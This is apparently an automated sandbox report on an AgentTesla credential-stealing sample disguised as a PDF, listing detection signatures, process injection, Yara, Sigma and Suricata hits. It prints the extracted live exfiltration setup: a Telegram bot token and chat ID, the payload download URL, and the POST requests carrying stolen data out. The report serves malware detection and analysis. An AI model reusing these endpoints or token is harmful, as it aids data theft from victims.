Edit tour

Windows Analysis Report
1C24TBP_00000143.pdf.exe

Overview

General Information

Sample name:	1C24TBP_00000143.pdf.exe
Analysis ID:	1564719
MD5:	cfbfabd8e0b67d01a19458be6b945517
SHA1:	fa3d597f04aa2dd1e7f97c9b8f9c69a5411c6361
SHA256:	eda66fd0e1f4c8f0cdda206c461373ec760cc02eb0972c121cdf0ffc64702f8f
Tags:	exeuser-abuse_ch
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Suspicious Double Extension File Execution

Suricata IDS alerts for network traffic

Yara detected AgentTesla

Yara detected Telegram RAT

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Creates a thread in another existing process (thread injection)

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Uses an obfuscated file name to hide its real file extension (double extension)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file does not import any functions

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: AspNetCompiler Execution

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

1C24TBP_00000143.pdf.exe (PID: 6916 cmdline: "C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe" MD5: CFBFABD8E0B67D01A19458BE6B945517)

aspnet_compiler.exe (PID: 1816 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe" MD5: DF5419B32657D2896514B6A1D041FE08)

conhost.exe (PID: 6996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7121198832:AAHWmvzY7jDQqG8pk3uwnutesjvQDyHyYTs/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7121198832:AAHWmvzY7jDQqG8pk3uwnutesjvQDyHyYTs/sendMessage?chat_id=-4176533554"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2652297569.000001F47B590000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000004.00000002.3384173500.000001698783F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.3384173500.000001698783F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000004.00000002.3383735891.0000016987600000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.3383735891.0000016987600000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.3383735891.0000016987600000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000004.00000002.3383735891.0000016987600000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x34d98:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x34e0a:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x34e94:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x34f26:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x34f90:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35002:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35098:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35128:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
00000004.00000002.3384173500.0000016987805000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.3384173500.0000016987805000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.3384173500.0000016987805000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.2630438443.000001F4005F7000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x6838:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x1d6e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000002.2638682795.000001F410C2E000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x801f8:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x8372e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000004.00000002.3382363801.0000016985AF0000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x3e108:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x4163e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000002.2630438443.000001F400061000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.2638682795.000001F410011000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: 1C24TBP_00000143.pdf.exe PID: 6916	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 1816	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 1816	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 1816	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.1C24TBP_00000143.pdf.exe.1f47b590000.11.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
4.2.aspnet_compiler.exe.16987600000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.aspnet_compiler.exe.16987600000.0.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.aspnet_compiler.exe.16987600000.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
4.2.aspnet_compiler.exe.16987600000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x34d98:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x34e0a:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x34e94:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x34f26:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x34f90:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35002:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35098:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35128:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
4.2.aspnet_compiler.exe.16987600000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.aspnet_compiler.exe.16987600000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.aspnet_compiler.exe.16987600000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
4.2.aspnet_compiler.exe.16987600000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x32f98:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3300a:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33094:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33126:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33190:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33202:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33298:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33328:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.1C24TBP_00000143.pdf.exe.1f41046d370.6.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.1C24TBP_00000143.pdf.exe.1f410356538.4.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.1C24TBP_00000143.pdf.exe.1f41023f6f8.7.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Click to see the 7 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Double Extension File Execution

Source: Process started

Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe", CommandLine: "C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe, NewProcessName: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe, OriginalFileName: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe", ProcessId: 6916, ProcessName: 1C24TBP_00000143.pdf.exe

Sigma detected: AspNetCompiler Execution

Source: Process started

Author: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe", ParentImage: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe, ParentProcessId: 6916, ParentProcessName: 1C24TBP_00000143.pdf.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe", ProcessId: 1816, ProcessName: aspnet_compiler.exe

Suricata Signatures

ETPRO MALWARE Agent Tesla Telegram Exfil

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-28T18:40:32.827539+0100	2851779	1	Malware Command and Control Activity Detected	192.168.2.6	49750	149.154.167.220	443	TCP

ETPRO MALWARE Agent Tesla Telegram Exfil M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-28T18:40:32.827539+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.6	49750	149.154.167.220	443	TCP
2024-11-28T18:40:35.219398+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.6	49752	149.154.167.220	443	TCP

ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-28T18:40:32.985769+0100	2854281	1	A Network Trojan was detected	149.154.167.220	443	192.168.2.6	49750	TCP
2024-11-28T18:40:35.374186+0100	2854281	1	A Network Trojan was detected	149.154.167.220	443	192.168.2.6	49752	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 1C24TBP_00000143.pdf.exe

Avira: detected

Found malware configuration

Source: 4.2.aspnet_compiler.exe.16987600000.0.raw.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7121198832:AAHWmvzY7jDQqG8pk3uwnutesjvQDyHyYTs/sendMessage?chat_id=-4176533554"}
Source: aspnet_compiler.exe.1816.4.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7121198832:AAHWmvzY7jDQqG8pk3uwnutesjvQDyHyYTs/sendMessage"}

Multi AV Scanner detection for submitted file

Source: 1C24TBP_00000143.pdf.exe

ReversingLabs: Detection: 63%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 1C24TBP_00000143.pdf.exe

Joe Sandbox ML: detected

Source: unknown	HTTPS traffic detected: 172.67.135.55:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49750 version: TLS 1.2

Source: 1C24TBP_00000143.pdf.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 1C24TBP_00000143.pdf.exe, 00000000.00000002.2638682795.000001F410B67000.00000004.00000800.00020000.00000000.sdmp, 1C24TBP_00000143.pdf.exe, 00000000.00000002.2650423134.000001F47A980000.00000004.08000000.00040000.00000000.sdmp, 1C24TBP_00000143.pdf.exe, 00000000.00000002.2630438443.000001F4004E6000.00000004.00000800.00020000.00000000.sdmp, 1C24TBP_00000143.pdf.exe, 00000000.00000002.2638682795.000001F410AEF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 1C24TBP_00000143.pdf.exe, 00000000.00000002.2638682795.000001F410B67000.00000004.00000800.00020000.00000000.sdmp, 1C24TBP_00000143.pdf.exe, 00000000.00000002.2650423134.000001F47A980000.00000004.08000000.00040000.00000000.sdmp, 1C24TBP_00000143.pdf.exe, 00000000.00000002.2630438443.000001F4004E6000.00000004.00000800.00020000.00000000.sdmp, 1C24TBP_00000143.pdf.exe, 00000000.00000002.2638682795.000001F410AEF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: 1C24TBP_00000143.pdf.exe, 00000000.00000002.2649795217.000001F47A890000.00000004.08000000.00040000.00000000.sdmp, 1C24TBP_00000143.pdf.exe, 00000000.00000002.2638682795.000001F4108B8000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: 1C24TBP_00000143.pdf.exe, 00000000.00000002.2649795217.000001F47A890000.00000004.08000000.00040000.00000000.sdmp, 1C24TBP_00000143.pdf.exe, 00000000.00000002.2638682795.000001F4108B8000.00000004.00000800.00020000.00000000.sdmp

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.6:49752 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.6:49750 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.6:49750 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.6:49752
Source: Network traffic	Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.6:49750

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /wp-includes/Nuymzsracm.mp4 HTTP/1.1Host: www.inspiranti.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7121198832:AAHWmvzY7jDQqG8pk3uwnutesjvQDyHyYTs/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd0fa9d74c97c9Host: api.telegram.orgContent-Length: 978Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7121198832:AAHWmvzY7jDQqG8pk3uwnutesjvQDyHyYTs/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd0fc884398fecHost: api.telegram.orgContent-Length: 917Expect: 100-continue

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /wp-includes/Nuymzsracm.mp4 HTTP/1.1Host: www.inspiranti.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: www.inspiranti.com
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7121198832:AAHWmvzY7jDQqG8pk3uwnutesjvQDyHyYTs/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd0fa9d74c97c9Host: api.telegram.orgContent-Length: 978Expect: 100-continueConnection: Keep-Alive

Source: aspnet_compiler.exe, 00000004.00000002.3384173500.000001698783F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3384173500.00000169878BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: 1C24TBP_00000143.pdf.exe, 00000000.00000002.2630438443.000001F400001000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3384173500.00000169877A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: aspnet_compiler.exe, 00000004.00000002.3384173500.0000016987805000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://uxVsY4GIHZ1cYWMz.net
Source: aspnet_compiler.exe, 00000004.00000002.3384173500.0000016987805000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://uxVsY4GIHZ1cYWMz.net2:
Source: aspnet_compiler.exe, 00000004.00000002.3383735891.0000016987600000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: aspnet_compiler.exe, 00000004.00000002.3383735891.0000016987600000.00000004.08000000.00040000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3384173500.00000169877A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: aspnet_compiler.exe, 00000004.00000002.3384173500.00000169877A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: aspnet_compiler.exe, 00000004.00000002.3384173500.0000016987805000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3384173500.00000169878BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: aspnet_compiler.exe, 00000004.00000002.3383735891.0000016987600000.00000004.08000000.00040000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3384173500.00000169877A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7121198832:AAHWmvzY7jDQqG8pk3uwnutesjvQDyHyYTs/
Source: aspnet_compiler.exe, 00000004.00000002.3384173500.0000016987805000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3384173500.00000169878BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7121198832:AAHWmvzY7jDQqG8pk3uwnutesjvQDyHyYTs/sendDocument
Source: 1C24TBP_00000143.pdf.exe, 00000000.00000002.2649795217.000001F47A890000.00000004.08000000.00040000.00000000.sdmp, 1C24TBP_00000143.pdf.exe, 00000000.00000002.2638682795.000001F4108B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: 1C24TBP_00000143.pdf.exe, 00000000.00000002.2649795217.000001F47A890000.00000004.08000000.00040000.00000000.sdmp, 1C24TBP_00000143.pdf.exe, 00000000.00000002.2638682795.000001F4108B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: 1C24TBP_00000143.pdf.exe, 00000000.00000002.2649795217.000001F47A890000.00000004.08000000.00040000.00000000.sdmp, 1C24TBP_00000143.pdf.exe, 00000000.00000002.2638682795.000001F4108B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: 1C24TBP_00000143.pdf.exe, 00000000.00000002.2649795217.000001F47A890000.00000004.08000000.00040000.00000000.sdmp, 1C24TBP_00000143.pdf.exe, 00000000.00000002.2638682795.000001F4108B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: 1C24TBP_00000143.pdf.exe, 00000000.00000002.2649795217.000001F47A890000.00000004.08000000.00040000.00000000.sdmp, 1C24TBP_00000143.pdf.exe, 00000000.00000002.2630438443.000001F400061000.00000004.00000800.00020000.00000000.sdmp, 1C24TBP_00000143.pdf.exe, 00000000.00000002.2638682795.000001F4108B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: 1C24TBP_00000143.pdf.exe, 00000000.00000002.2649795217.000001F47A890000.00000004.08000000.00040000.00000000.sdmp, 1C24TBP_00000143.pdf.exe, 00000000.00000002.2638682795.000001F4108B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: 1C24TBP_00000143.pdf.exe, 00000000.00000002.2630438443.000001F400001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.inspiranti.com
Source: 1C24TBP_00000143.pdf.exe	String found in binary or memory: https://www.inspiranti.com/wp-includes/Nuymzsracm.mp4

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749

Source: unknown	HTTPS traffic detected: 172.67.135.55:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49750 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.aspnet_compiler.exe.16987600000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 4.2.aspnet_compiler.exe.16987600000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000004.00000002.3383735891.0000016987600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000000.00000002.2630438443.000001F4005F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.2638682795.000001F410C2E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000004.00000002.3382363801.0000016985AF0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: 1C24TBP_00000143.pdf.exe

Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Code function: 0_2_00007FFD348A7563	0_2_00007FFD348A7563
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Code function: 0_2_00007FFD348A6FF2	0_2_00007FFD348A6FF2
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Code function: 0_2_00007FFD348A71FA	0_2_00007FFD348A71FA
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Code function: 0_2_00007FFD34A77C15	0_2_00007FFD34A77C15
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Code function: 0_2_00007FFD34A70FF9	0_2_00007FFD34A70FF9
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Code function: 0_2_00007FFD34A7082D	0_2_00007FFD34A7082D
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Code function: 0_2_00007FFD34A704F8	0_2_00007FFD34A704F8
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Code function: 0_2_00007FFD34A804C0	0_2_00007FFD34A804C0
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Code function: 0_2_00007FFD34A704CB	0_2_00007FFD34A704CB
Source: C:\Users\user\Desktop\1C24TBP_00000143.pdf.exe	Code function: 0_2_00007FFD34A805D4	0_2_00007FFD34A805D4
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0000016985B2F778	4_2_0000016985B2F778
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0000016985B2F39C	4_2_0000016985B2F39C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0000016985B3065C	4_2_0000016985B3065C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0000016985B32E54	4_2_0000016985B32E54
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0000016985B2E4C0	4_2_0000016985B2E4C0
